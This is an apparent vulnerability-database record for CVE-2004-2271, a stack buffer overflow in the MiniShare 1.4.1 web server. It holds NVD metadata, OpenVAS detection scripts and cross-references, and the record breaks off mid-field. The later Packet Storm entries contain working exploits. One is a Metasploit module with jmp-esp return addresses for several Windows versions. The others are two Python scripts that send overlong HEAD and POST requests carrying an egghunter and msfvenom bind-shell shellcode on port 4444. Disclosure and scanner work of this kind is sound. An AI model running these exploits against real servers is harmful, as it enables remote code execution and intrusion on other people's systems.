ID CVE-2004-2271
Type cve
Reporter cve@mitre.org
Modified 2017-07-11T01:31:00
Description
Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.
{"id": "CVE-2004-2271", "bulletinFamily": "NVD", "title": "CVE-2004-2271", "description": "Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.", "published": "2004-12-31T05:00:00", "modified": "2017-07-11T01:31:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2271", "reporter": "cve@mitre.org", "references": ["http://secunia.com/advisories/13114", "http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/17978", "http://sourceforge.net/project/shownotes.php?release_id=241158", "http://www.securiteam.com/exploits/6X00B1PBPC.html", "http://www.osvdb.org/11530", "http://www.securityfocus.com/bid/11620", "http://securitytracker.com/id?1012106"], "cvelist": ["CVE-2004-2271"], "type": "cve", "lastseen": "2021-02-02T05:23:01", "edition": 6, "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:136141256231018424", "OPENVAS:18424"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:150689", "PACKETSTORM:82959"]}, {"type": "osvdb", "idList": ["OSVDB:11530"]}, {"type": "exploitdb", "idList": ["EDB-ID:616", "EDB-ID:16754", "EDB-ID:636"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/MINISHARE_GET_OVERFLOW"]}, {"type": "nessus", "idList": ["MINISHARE_OVERFLOW.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-31748"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:64B73DAC0A0638D9032B0D40ABD6337C"]}], "modified": "2021-02-02T05:23:01", "rev": 2}, "score": {"value": 8.2, "vector": "NONE", "modified": "2021-02-02T05:23:01", "rev": 2}, "vulnersScore": 8.2}, "cpe": ["cpe:/a:minishare:minimal_http_server:1.4.1"], "affectedSoftware": [{"cpeName": "minishare:minimal_http_server", "name": "minishare minimal http server", "operator": "le", "version": "1.4.1"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": true, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:minishare:minimal_http_server:1.4.1:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:minishare:minimal_http_server:1.4.1:*:*:*:*:*:*:*", "versionEndIncluding": "1.4.1", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "13114", "refsource": "SECUNIA", "tags": ["Patch", "Vendor Advisory"], "url": "http://secunia.com/advisories/13114"}, {"name": "20041107 [New VULNERABILTY + Exploit] MiniShare, Minimal HTTP Server for Windows, Remote Buffer Overflow Exploit", "refsource": "FULLDISC", "tags": ["Vendor Advisory"], "url": "http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html"}, {"name": "http://sourceforge.net/project/shownotes.php?release_id=241158", "refsource": "CONFIRM", "tags": ["Patch"], "url": "http://sourceforge.net/project/shownotes.php?release_id=241158"}, {"name": "1012106", "refsource": "SECTRACK", "tags": ["Exploit"], "url": "http://securitytracker.com/id?1012106"}, {"name": "11620", "refsource": "BID", "tags": ["Exploit"], "url": "http://www.securityfocus.com/bid/11620"}, {"name": "minishare-address-link-bo(17978)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17978"}, {"name": "http://www.securiteam.com/exploits/6X00B1PBPC.html", "refsource": "MISC", "tags": ["Exploit"], "url": "http://www.securiteam.com/exploits/6X00B1PBPC.html"}, {"name": "11530", "refsource": "OSVDB", "tags": ["Patch"], "url": "http://www.osvdb.org/11530"}]}
{"openvas": [{"lastseen": "2020-05-08T08:39:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-2271"], "description": "MiniShare 1.4.1 and prior versions are affected by a buffer overflow flaw.", "modified": "2020-05-05T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231018424", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231018424", "type": "openvas", "title": "MiniShare webserver buffer overflow", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# MiniShare webserver buffer overflow\n#\n# Authors:\n# Gareth Phillips - SensePost PTY ltd (www.sensepost.com)\n# Changes by Tenable Network Security :\n# * detect title to prevent false positives\n# * fix version detection\n# * added CVE and OSVDB xrefs.\n#\n# Copyright:\n# Copyright (C) 2005 SensePost\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.18424\");\n script_version(\"2020-05-05T09:44:01+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 09:44:01 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_cve_id(\"CVE-2004-2271\");\n script_bugtraq_id(11620);\n script_xref(name:\"OSVDB\", value:\"11530\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"MiniShare webserver buffer overflow\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2005 SensePost\");\n script_family(\"Gain a shell remotely\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"summary\", value:\"MiniShare 1.4.1 and prior versions are affected by a buffer overflow flaw.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker could execute arbitrary commands by sending a specially\n crafted file name in a the GET request.\");\n\n script_tag(name:\"affected\", value:\"Version 1.3.4 and below do not seem to be vulnerable.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to MiniShare 1.4.2 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\n\nres = http_get_cache( item:\"/\", port:port );\nif(!res || \"<title>MiniShare</title>\" >!< res)\n exit( 0 );\n\nif( egrep( string:res, pattern:'<p class=\"versioninfo\"><a href=\"http://minishare\\\\.sourceforge\\\\.net/\">MiniShare 1\\\\.(3\\\\.([4-9][^0-9]|[0-9][0-9])|4\\\\.[01][^0-9])' ) ) {\n security_message( port:port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-12-08T11:44:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-2271"], "description": "MiniShare 1.4.1 and prior versions are affected by a buffer overflow flaw.\nA remote attacker could execute arbitrary commands by sending a specially\ncrafted file name in a the GET request.\n\nVersion 1.3.4 and below do not seem to be vulnerable.", "modified": "2017-12-07T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:18424", "href": "http://plugins.openvas.org/nasl.php?oid=18424", "type": "openvas", "title": "MiniShare webserver buffer overflow", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: minishare_overflow.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: MiniShare webserver buffer overflow\n#\n# Authors:\n# Gareth Phillips - SensePost PTY ltd (www.sensepost.com)\n# Changes by Tenable Network Security :\n# * detect title to prevent false positives\n# * fix version detection\n# * added CVE and OSVDB xrefs.\n#\n# Copyright:\n# Copyright (C) 2005 SensePost\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"MiniShare 1.4.1 and prior versions are affected by a buffer overflow flaw.\nA remote attacker could execute arbitrary commands by sending a specially\ncrafted file name in a the GET request.\n\nVersion 1.3.4 and below do not seem to be vulnerable.\";\n\ntag_solution = \"Upgrade to MiniShare 1.4.2 or higher.\";\n\nif(description)\n{\n script_id(18424);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_cve_id(\"CVE-2004-2271\");\n script_bugtraq_id (11620);\n script_xref(name:\"OSVDB\", value:\"11530\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n\n name = \"MiniShare webserver buffer overflow\";\n script_name(name);\n\n\n\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_copyright(\"This script is Copyright (C) 2005 SensePost\");\n family = \"Gain a shell remotely\";\n script_family(family);\n script_dependencies(\"find_service.nasl\", \"no404.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# Code Starts Here\n#\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\n\nif(get_port_state(port))\n{\nres = http_get_cache(item:\"/\", port:port);\nif( res == NULL ) exit(0);\nif (\"<title>MiniShare</title>\" >!< res)\n exit (0);\n\nif (egrep (string:res, pattern:'<p class=\"versioninfo\"><a href=\"http://minishare\\\\.sourceforge\\\\.net/\">MiniShare 1\\\\.(3\\\\.([4-9][^0-9]|[0-9][0-9])|4\\\\.[0-1][^0-9])'))\n security_message (port);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:06", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Minishare 1.4.1 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-2271"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:82959", "href": "https://packetstormsecurity.com/files/82959/Minishare-1.4.1-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Minishare 1.4.1 Buffer Overflow', \n'Description' => %q{ \nThis is a simple buffer overflow for the minishare web \nserver. This flaw affects all versions prior to 1.4.2. This \nis a plain stack overflow that requires a \"jmp esp\" to reach \nthe payload, making this difficult to target many platforms \nat once. This module has been successfully tested against \n1.4.1. Version 1.3.4 and below do not seem to be vulnerable. \n \n}, \n'Author' => [ 'acaro <acaro@jervus.it>' ], \n'License' => BSD_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2004-2271'], \n[ 'OSVDB', '11530'], \n[ 'BID', '11620'], \n[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html'], \n \n], \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\\x40\", \n'MinNops' => 64, \n'StackAdjustment' => -3500, \n \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n['Windows 2000 SP0-SP3 English', { 'Rets' => [ 1787, 0x7754a3ab ]}], # jmp esp \n['Windows 2000 SP4 English', { 'Rets' => [ 1787, 0x7517f163 ]}], # jmp esp \n['Windows XP SP0-SP1 English', { 'Rets' => [ 1787, 0x71ab1d54 ]}], # push esp, ret \n['Windows XP SP2 English', { 'Rets' => [ 1787, 0x71ab9372 ]}], # push esp, ret \n['Windows 2003 SP0 English', { 'Rets' => [ 1787, 0x71c03c4d ]}], # push esp, ret \n['Windows NT 4.0 SP6', { 'Rets' => [ 1787, 0x77f329f8 ]}], # jmp esp \n['Windows XP SP2 German', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp \n['Windows XP SP2 Polish', { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp \n['Windows XP SP2 French', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp \n], \n'DisclosureDate' => 'Nov 7 2004')) \nend \n \ndef exploit \nuri = rand_text_alphanumeric(target['Rets'][0]) \nuri << [target['Rets'][1]].pack('V') \nuri << payload.encoded \n \nprint_status(\"Trying target address 0x%.8x...\" % target['Rets'][1]) \nsend_request_raw({ \n'uri' => uri \n}, 5) \n \nhandler \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82959/minishare_get_overflow.rb.txt"}, {"lastseen": "2018-12-08T02:36:14", "description": "", "published": "2018-12-07T00:00:00", "type": "packetstorm", "title": "MiniShare 1.4.1 HEAD / POST Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-19862", "CVE-2018-19861", "CVE-2004-2271"], "modified": "2018-12-07T00:00:00", "id": "PACKETSTORM:150689", "href": "https://packetstormsecurity.com/files/150689/MiniShare-1.4.1-HEAD-POST-Buffer-Overflow.html", "sourceData": "`Hi!!! playing in 2006.... I have adapted the exploit to python \n \nNot only the GET method is vulnerable to BOF (CVE-2004-2271). HEAD and POST \nmethods are also vulnerable. The difference is minimal, both are exploited \nin the same way. Only 1 byte difference: GET = 3, HEAD and POST = 4 length \n \n------------------------------------------------------------------- \n \nEAX 00000000 \nECX 77C3EF3B msvcrt.77C3EF3B \nEDX 00F14E38 \nEBX 43346843 \nESP 01563908 ASCII \n\"6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co \nHTTP/1.1 \n\" \nEBP 0156BB90 \nESI 00000001 \nEDI 01565B68 \nEIP 68433568 \nC 0 ES 0023 32bit 0(FFFFFFFF) \nP 1 CS 001B 32bit 0(FFFFFFFF) \nA 1 SS 0023 32bit 0(FFFFFFFF) \nZ 0 DS 0023 32bit 0(FFFFFFFF) \nS 0 FS 003B 32bit 7FFDD000(FFF) \nT 0 GS 0000 NULL \nD 0 \nO 0 LastErr ERROR_SUCCESS (00000000) \nEFL 00010216 (NO,NB,NE,A,NS,PE,GE,G) \nST0 empty \nST1 empty \nST2 empty \nST3 empty \nST4 empty \nST5 empty \nST6 empty \nST7 empty \n3 2 1 0 E S P U O Z D I \nFST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) \nFCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 \n \n------------------------------------------------------------------------------ \n \nOnly 210 bytes to shellcode \n \n------------------------------------------------------------------------------ \n \nBadchars '00','0d' \n \n------------------------------------------------------------------------------ \n \n>findjmp kernel32.dll esp - XP SP 3 English \n \nScanning kernel32.dll for code useable with the esp register \n0x7C809F83 call esp \n0x7C8369E0 call esp \n0x7C83C2C5 push esp - ret \n0x7C87641B call esp \n \n \n<!-- \n# Exploit Title: Buffer overflow in MiniShare 1.4.1 HEAD method. \n# Date: 05-12-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://minishare.sourceforge.net/ \n# Software Link: http://minishare.sourceforge.net/ \n# Version: Minishare v1.4.1 \n# Tested on: Windows \n# CVE : CVE-2018-19861 \n# Category: exploit \n \n1. Description \n \nBuffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to \nexecute arbitrary code via a long HTTP HEAD request. \n \n \n2. Proof of Concept \n \nExploit: \n \n#!/usr/bin/env python \nimport socket \nimport struct \nimport os \n \n# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to \nexecute arbitrary code via a long HTTP HEAD request - by Rafa \n# CVE: CVE-2018-19861 \n# Via Egghunter because shellcode in ESP only 210 bytes long. \n# Project Home Page (MiniShare) - http://minishare.sourceforge.net/ \nconnection=socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nhost = \"127.0.0.1\" \nport = 80 \n \n# 32 bytes Egghunter - Egg = r4f4 = \\x72\\x34\\x66\\x34 \negghunter = \n\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x72\\x34\\x66\\x34\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\" \n \n#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f \npython -a x86 --platform windows -b \"\\x00\\x0d\" -f c \n#Found 10 compatible encoders \n#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai \n#x86/shikata_ga_nai succeeded with size 355 (iteration=0) \n#x86/shikata_ga_nai chosen with final size 355 \n#Payload size: 355 bytes \n#Final size of c file: 1516 bytes \n#unsigned char buf[] = \nshellcode=(\"r4f4r4f4\"+\"\\xda\\xd4\\xb8\\xda\\xe7\\x1b\\xca\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9\\xb1\" \n\"\\x53\\x83\\xea\\xfc\\x31\\x42\\x13\\x03\\x98\\xf4\\xf9\\x3f\\xe0\\x13\\x7f\" \n\"\\xbf\\x18\\xe4\\xe0\\x49\\xfd\\xd5\\x20\\x2d\\x76\\x45\\x91\\x25\\xda\\x6a\" \n\"\\x5a\\x6b\\xce\\xf9\\x2e\\xa4\\xe1\\x4a\\x84\\x92\\xcc\\x4b\\xb5\\xe7\\x4f\" \n\"\\xc8\\xc4\\x3b\\xaf\\xf1\\x06\\x4e\\xae\\x36\\x7a\\xa3\\xe2\\xef\\xf0\\x16\" \n\"\\x12\\x9b\\x4d\\xab\\x99\\xd7\\x40\\xab\\x7e\\xaf\\x63\\x9a\\xd1\\xbb\\x3d\" \n\"\\x3c\\xd0\\x68\\x36\\x75\\xca\\x6d\\x73\\xcf\\x61\\x45\\x0f\\xce\\xa3\\x97\" \n\"\\xf0\\x7d\\x8a\\x17\\x03\\x7f\\xcb\\x90\\xfc\\x0a\\x25\\xe3\\x81\\x0c\\xf2\" \n\"\\x99\\x5d\\x98\\xe0\\x3a\\x15\\x3a\\xcc\\xbb\\xfa\\xdd\\x87\\xb0\\xb7\\xaa\" \n\"\\xcf\\xd4\\x46\\x7e\\x64\\xe0\\xc3\\x81\\xaa\\x60\\x97\\xa5\\x6e\\x28\\x43\" \n\"\\xc7\\x37\\x94\\x22\\xf8\\x27\\x77\\x9a\\x5c\\x2c\\x9a\\xcf\\xec\\x6f\\xf3\" \n\"\\x3c\\xdd\\x8f\\x03\\x2b\\x56\\xfc\\x31\\xf4\\xcc\\x6a\\x7a\\x7d\\xcb\\x6d\" \n\"\\x7d\\x54\\xab\\xe1\\x80\\x57\\xcc\\x28\\x47\\x03\\x9c\\x42\\x6e\\x2c\\x77\" \n\"\\x92\\x8f\\xf9\\xe2\\x9a\\x36\\x52\\x11\\x67\\x88\\x02\\x95\\xc7\\x61\\x49\" \n\"\\x1a\\x38\\x91\\x72\\xf0\\x51\\x3a\\x8f\\xfb\\x4c\\xe7\\x06\\x1d\\x04\\x07\" \n\"\\x4f\\xb5\\xb0\\xe5\\xb4\\x0e\\x27\\x15\\x9f\\x26\\xcf\\x5e\\xc9\\xf1\\xf0\" \n\"\\x5e\\xdf\\x55\\x66\\xd5\\x0c\\x62\\x97\\xea\\x18\\xc2\\xc0\\x7d\\xd6\\x83\" \n\"\\xa3\\x1c\\xe7\\x89\\x53\\xbc\\x7a\\x56\\xa3\\xcb\\x66\\xc1\\xf4\\x9c\\x59\" \n\"\\x18\\x90\\x30\\xc3\\xb2\\x86\\xc8\\x95\\xfd\\x02\\x17\\x66\\x03\\x8b\\xda\" \n\"\\xd2\\x27\\x9b\\x22\\xda\\x63\\xcf\\xfa\\x8d\\x3d\\xb9\\xbc\\x67\\x8c\\x13\" \n\"\\x17\\xdb\\x46\\xf3\\xee\\x17\\x59\\x85\\xee\\x7d\\x2f\\x69\\x5e\\x28\\x76\" \n\"\\x96\\x6f\\xbc\\x7e\\xef\\x8d\\x5c\\x80\\x3a\\x16\\x6c\\xcb\\x66\\x3f\\xe5\" \n\"\\x92\\xf3\\x7d\\x68\\x25\\x2e\\x41\\x95\\xa6\\xda\\x3a\\x62\\xb6\\xaf\\x3f\" \n\"\\x2e\\x70\\x5c\\x32\\x3f\\x15\\x62\\xe1\\x40\\x3c\") \n \n# findjmp kernel32.dll esp - WinXP SP3 English \n#0x7C809F83 call esp \n \nnops = \"\\x90\" * 16 \n \njunk = \"A\" * 1786 + \"\\x83\\x9f\\x80\\x7c\" + nops + egghunter + \"C\" * (2000 - \n1786 - 4 - 16 - len(egghunter)) \n \ntry: \nprint \"Sending exploit...\" \nconnection.connect((host,port)) \nbuffer = ( \n\"HEAD \" + junk + \" HTTP/1.1\\r\\n\" \n\"Host: \" + shellcode + \"\\r\\n\\r\\n\") \n \nconnection.send(buffer) \nconnection.close() \nprint \"\\nExploit Sended \", len(buffer) \nexcept: \nprint \"Connection error\" \n \n \n \n3. Solution: \n \nThis product is deprecated \n \n--> \n \n \n<!-- \n# Exploit Title: Buffer overflow in MiniShare 1.4.1 POST method. \n# Date: 05-12-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://minishare.sourceforge.net/ \n# Software Link: http://minishare.sourceforge.net/ \n# Version: Minishare v1.4.1 \n# Tested on: Windows \n# CVE : CVE-2018-19862 \n# Category: exploit \n \n1. Description \n \nBuffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to \nexecute arbitrary code via a long HTTP POST request. \n \n \n2. Proof of Concept \n \nExploit: \n \n#!/usr/bin/env python \nimport socket \nimport struct \nimport os \n \n# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to \nexecute arbitrary code via a long HTTP POST request - by Rafa \n# CVE: CVE-2018-19862 \n# Via Egghunter because shellcode in ESP only 210 bytes long. \n# Project Home Page (MiniShare) - http://minishare.sourceforge.net/ \nconnection=socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nhost = \"127.0.0.1\" \nport = 80 \n \n# 32 bytes Egghunter - Egg = r4f4 = \\x72\\x34\\x66\\x34 \negghunter = \n\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x72\\x34\\x66\\x34\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\" \n \n#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f \npython -a x86 --platform windows -b \"\\x00\\x0d\" -f c \n#Found 10 compatible encoders \n#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai \n#x86/shikata_ga_nai succeeded with size 355 (iteration=0) \n#x86/shikata_ga_nai chosen with final size 355 \n#Payload size: 355 bytes \n#Final size of c file: 1516 bytes \n#unsigned char buf[] = \nshellcode=(\"r4f4r4f4\"+\"\\xda\\xd4\\xb8\\xda\\xe7\\x1b\\xca\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9\\xb1\" \n\"\\x53\\x83\\xea\\xfc\\x31\\x42\\x13\\x03\\x98\\xf4\\xf9\\x3f\\xe0\\x13\\x7f\" \n\"\\xbf\\x18\\xe4\\xe0\\x49\\xfd\\xd5\\x20\\x2d\\x76\\x45\\x91\\x25\\xda\\x6a\" \n\"\\x5a\\x6b\\xce\\xf9\\x2e\\xa4\\xe1\\x4a\\x84\\x92\\xcc\\x4b\\xb5\\xe7\\x4f\" \n\"\\xc8\\xc4\\x3b\\xaf\\xf1\\x06\\x4e\\xae\\x36\\x7a\\xa3\\xe2\\xef\\xf0\\x16\" \n\"\\x12\\x9b\\x4d\\xab\\x99\\xd7\\x40\\xab\\x7e\\xaf\\x63\\x9a\\xd1\\xbb\\x3d\" \n\"\\x3c\\xd0\\x68\\x36\\x75\\xca\\x6d\\x73\\xcf\\x61\\x45\\x0f\\xce\\xa3\\x97\" \n\"\\xf0\\x7d\\x8a\\x17\\x03\\x7f\\xcb\\x90\\xfc\\x0a\\x25\\xe3\\x81\\x0c\\xf2\" \n\"\\x99\\x5d\\x98\\xe0\\x3a\\x15\\x3a\\xcc\\xbb\\xfa\\xdd\\x87\\xb0\\xb7\\xaa\" \n\"\\xcf\\xd4\\x46\\x7e\\x64\\xe0\\xc3\\x81\\xaa\\x60\\x97\\xa5\\x6e\\x28\\x43\" \n\"\\xc7\\x37\\x94\\x22\\xf8\\x27\\x77\\x9a\\x5c\\x2c\\x9a\\xcf\\xec\\x6f\\xf3\" \n\"\\x3c\\xdd\\x8f\\x03\\x2b\\x56\\xfc\\x31\\xf4\\xcc\\x6a\\x7a\\x7d\\xcb\\x6d\" \n\"\\x7d\\x54\\xab\\xe1\\x80\\x57\\xcc\\x28\\x47\\x03\\x9c\\x42\\x6e\\x2c\\x77\" \n\"\\x92\\x8f\\xf9\\xe2\\x9a\\x36\\x52\\x11\\x67\\x88\\x02\\x95\\xc7\\x61\\x49\" \n\"\\x1a\\x38\\x91\\x72\\xf0\\x51\\x3a\\x8f\\xfb\\x4c\\xe7\\x06\\x1d\\x04\\x07\" \n\"\\x4f\\xb5\\xb0\\xe5\\xb4\\x0e\\x27\\x15\\x9f\\x26\\xcf\\x5e\\xc9\\xf1\\xf0\" \n\"\\x5e\\xdf\\x55\\x66\\xd5\\x0c\\x62\\x97\\xea\\x18\\xc2\\xc0\\x7d\\xd6\\x83\" \n\"\\xa3\\x1c\\xe7\\x89\\x53\\xbc\\x7a\\x56\\xa3\\xcb\\x66\\xc1\\xf4\\x9c\\x59\" \n\"\\x18\\x90\\x30\\xc3\\xb2\\x86\\xc8\\x95\\xfd\\x02\\x17\\x66\\x03\\x8b\\xda\" \n\"\\xd2\\x27\\x9b\\x22\\xda\\x63\\xcf\\xfa\\x8d\\x3d\\xb9\\xbc\\x67\\x8c\\x13\" \n\"\\x17\\xdb\\x46\\xf3\\xee\\x17\\x59\\x85\\xee\\x7d\\x2f\\x69\\x5e\\x28\\x76\" \n\"\\x96\\x6f\\xbc\\x7e\\xef\\x8d\\x5c\\x80\\x3a\\x16\\x6c\\xcb\\x66\\x3f\\xe5\" \n\"\\x92\\xf3\\x7d\\x68\\x25\\x2e\\x41\\x95\\xa6\\xda\\x3a\\x62\\xb6\\xaf\\x3f\" \n\"\\x2e\\x70\\x5c\\x32\\x3f\\x15\\x62\\xe1\\x40\\x3c\") \n \n# findjmp kernel32.dll esp - WinXP SP3 English \n#0x7C809F83 call esp \n \nnops = \"\\x90\" * 16 \n \njunk = \"A\" * 1786 + \"\\x83\\x9f\\x80\\x7c\" + nops + egghunter + \"C\" * (2000 - \n1786 - 4 - 16 - len(egghunter)) \n \ntry: \nprint \"Sending exploit...\" \nconnection.connect((host,port)) \n \nbuffer = ( \n\"POST \" + junk + \" HTTP/1.1\\r\\n\" \n\"Host: \" + shellcode + \"\\r\\n\\r\\n\") \n \nconnection.send(buffer) \nconnection.close() \nprint \"\\nExploit Sended \", len(buffer) \nexcept: \nprint \"Connection error\" \n \n \n \n3. Solution: \n \nThis product is deprecated \n \n--> \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/150689/minishare141-overflow.txt"}], "osvdb": 